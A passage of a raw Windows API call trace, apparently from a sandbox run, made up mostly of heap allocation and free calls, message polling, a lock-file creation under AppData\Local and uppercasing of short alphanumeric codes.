0x34aa778 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0251.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.297] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0251.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0251.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0251.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Temporary Internet Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.temporary internet files"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0251.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0251.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0251.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.302] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0251.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.307] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0251.307] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0251.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0251.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0251.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0251.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0251.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0251.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0251.310] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0251.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.310] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0251.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.312] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.313] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0251.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0251.313] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.313] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 